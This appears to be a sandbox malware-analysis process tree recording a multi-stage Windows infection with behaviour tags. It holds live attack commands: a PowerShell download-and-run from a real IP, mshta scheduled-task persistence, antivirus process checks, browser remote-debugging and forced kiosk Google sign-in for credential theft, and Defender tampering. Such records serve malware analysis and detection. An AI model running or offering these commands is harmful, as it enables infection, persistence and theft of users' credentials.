- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:12580
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337530101\f2839c3fc6.exe"C:\Users\Admin\AppData\Local\Temp\10337530101\f2839c3fc6.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3912 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn hJihtmaR798 /tr "mshta C:\Users\Admin\AppData\Local\Temp\1CPuUA0Vd.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:552 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn hJihtmaR798 /tr "mshta C:\Users\Admin\AppData\Local\Temp\1CPuUA0Vd.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2416
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\1CPuUA0Vd.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3600 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CHJ72QNR6L8OIM6YC0DKSN1SHZ3MLTY8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100 -
C:\Users\Admin\AppData\Local\TempCHJ72QNR6L8OIM6YC0DKSN1SHZ3MLTY8.EXE"C:\Users\Admin\AppData\Local\TempCHJ72QNR6L8OIM6YC0DKSN1SHZ3MLTY8.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7036
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1932 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵
- System Location Discovery: System Language Discovery
PID:5224 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:8904
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:8680
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:8468
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵
- System Location Discovery: System Language Discovery
PID:8452
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183775⤵
- System Location Discovery: System Language Discovery
PID:8312
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab5⤵
- System Location Discovery: System Language Discovery
PID:208
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation5⤵
- System Location Discovery: System Language Discovery
PID:7964
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com5⤵
- System Location Discovery: System Language Discovery
PID:7844
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N5⤵
- System Location Discovery: System Language Discovery
PID:7556
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7404
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:7224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337910101\30f17d9520.exe"C:\Users\Admin\AppData\Local\Temp\10337910101\30f17d9520.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:11164 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10337910101\30f17d9520.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5128
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337920101\08422377eb.exe"C:\Users\Admin\AppData\Local\Temp\10337920101\08422377eb.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:8888 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10337920101\08422377eb.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3132
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337930101\c8b4d5e382.exe"C:\Users\Admin\AppData\Local\Temp\10337930101\c8b4d5e382.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4460 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:3388
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3964
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337940101\39d1db7685.exe"C:\Users\Admin\AppData\Local\Temp\10337940101\39d1db7685.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6088 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:5708
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5692
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337950101\327e56b382.exe"C:\Users\Admin\AppData\Local\Temp\10337950101\327e56b382.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:9304
-
-
C:\Users\Admin\AppData\Local\Temp\10337960101\d5e3ea69b4.exe"C:\Users\Admin\AppData\Local\Temp\10337960101\d5e3ea69b4.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:10980 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:11500 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffb076dcf8,0x7fffb076dd04,0x7fffb076dd105⤵PID:11540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1932,i,16867859896798777901,565534595447294613,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1928 /prefetch:25⤵PID:11964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2248,i,16867859896798777901,565534595447294613,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2264 /prefetch:35⤵PID:12016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2364,i,16867859896798777901,565534595447294613,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2392 /prefetch:85⤵PID:5484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,16867859896798777901,565534595447294613,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3264 /prefetch:15⤵
- Uses browser remote debugging
PID:12364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3460,i,16867859896798777901,565534595447294613,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3500 /prefetch:15⤵
- Uses browser remote debugging
PID:12356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4432,i,16867859896798777901,565534595447294613,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4448 /prefetch:25⤵
- Uses browser remote debugging
PID:12684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4672,i,16867859896798777901,565534595447294613,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4688 /prefetch:15⤵
- Uses browser remote debugging
PID:12764
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:7672 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x214,0x2b8,0x7fffadb5f208,0x7fffadb5f214,0x7fffadb5f2205⤵PID:8636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1928,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=1924 /prefetch:25⤵PID:4592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2120,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:35⤵PID:8660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2564,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:85⤵PID:7700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3556,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:15⤵
- Uses browser remote debugging
PID:952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3564,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:15⤵
- Uses browser remote debugging
PID:3512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4208,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=4284 /prefetch:15⤵
- Uses browser remote debugging
PID:8268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4244,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=4288 /prefetch:25⤵
- Uses browser remote debugging
PID:8252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=5184 /prefetch:85⤵PID:13136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5256,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=5332 /prefetch:85⤵PID:12808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5236,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=5336 /prefetch:85⤵PID:5784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5200,i,14464318084210189389,10499291884795453229,262144 --variations-seed-version --mojo-platform-channel-handle=5536 /prefetch:85⤵PID:5732
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337970101\b969c99e16.exe"C:\Users\Admin\AppData\Local\Temp\10337970101\b969c99e16.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:12572 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12796
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6112
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4888
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4064
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6288
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:6008
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2116 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2084 -initialChannelId {76c61d76-b31a-4fbe-a06e-f2773a27c559} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu6⤵PID:7052
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {07853133-3134-4c04-822a-b7fb095a92ab} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket6⤵PID:4828
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3784 -prefsLen 25164 -prefMapHandle 3788 -prefMapSize 270279 -jsInitHandle 3792 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3800 -initialChannelId {2edf7c06-6367-4ad1-b384-5e95c39acb3e} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab6⤵
- Checks processor information in registry
PID:776
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3956 -prefsLen 27276 -prefMapHandle 3960 -prefMapSize 270279 -ipcHandle 4052 -initialChannelId {d8728fc8-a770-487d-bfa7-114c13f914db} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd6⤵PID:8300
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4528 -prefsLen 34775 -prefMapHandle 4532 -prefMapSize 270279 -jsInitHandle 4536 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4544 -initialChannelId {eaa568fb-a6fa-41e1-b77b-bb3aafbc3285} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab6⤵
- Checks processor information in registry
PID:9312
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5136 -prefsLen 35012 -prefMapHandle 5140 -prefMapSize 270279 -ipcHandle 5148 -initialChannelId {f5da60b5-1258-4e67-b3a5-b032aeb35536} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility6⤵
- Checks processor information in registry
PID:6960
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5368 -prefsLen 32952 -prefMapHandle 5372 -prefMapSize 270279 -jsInitHandle 5376 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5388 -initialChannelId {3d38fe74-6fa5-4aae-a1e1-e2a40d86431d} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab6⤵
- Checks processor information in registry
PID:4876
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5400 -prefsLen 32952 -prefMapHandle 5404 -prefMapSize 270279 -jsInitHandle 5408 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5420 -initialChannelId {18f3f7b7-ec95-403e-828b-4fc1a6464f5e} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab6⤵
- Checks processor information in registry
PID:7072
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5780 -prefsLen 32952 -prefMapHandle 5784 -prefMapSize 270279 -jsInitHandle 5788 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5756 -initialChannelId {70560cdc-d394-4316-a389-8a829bb57433} -parentPid 2116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab6⤵
- Checks processor information in registry
PID:7108
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337980101\8b610ed21e.exe"C:\Users\Admin\AppData\Local\Temp\10337980101\8b610ed21e.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6256
-
-
C:\Users\Admin\AppData\Local\Temp\10337990101\f73ae_003.exe"C:\Users\Admin\AppData\Local\Temp\10337990101\f73ae_003.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7120
-
-
C:\Users\Admin\AppData\Local\Temp\10338000101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10338000101\7IIl2eE.exe"3⤵PID:5240
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵PID:5824
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:13232
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵PID:13292
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:6728
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵PID:2560
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183775⤵PID:6224
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab5⤵PID:6736
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation5⤵PID:10100
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com5⤵PID:9716
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N5⤵PID:10556
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N5⤵PID:10724
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:11148
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5576
-
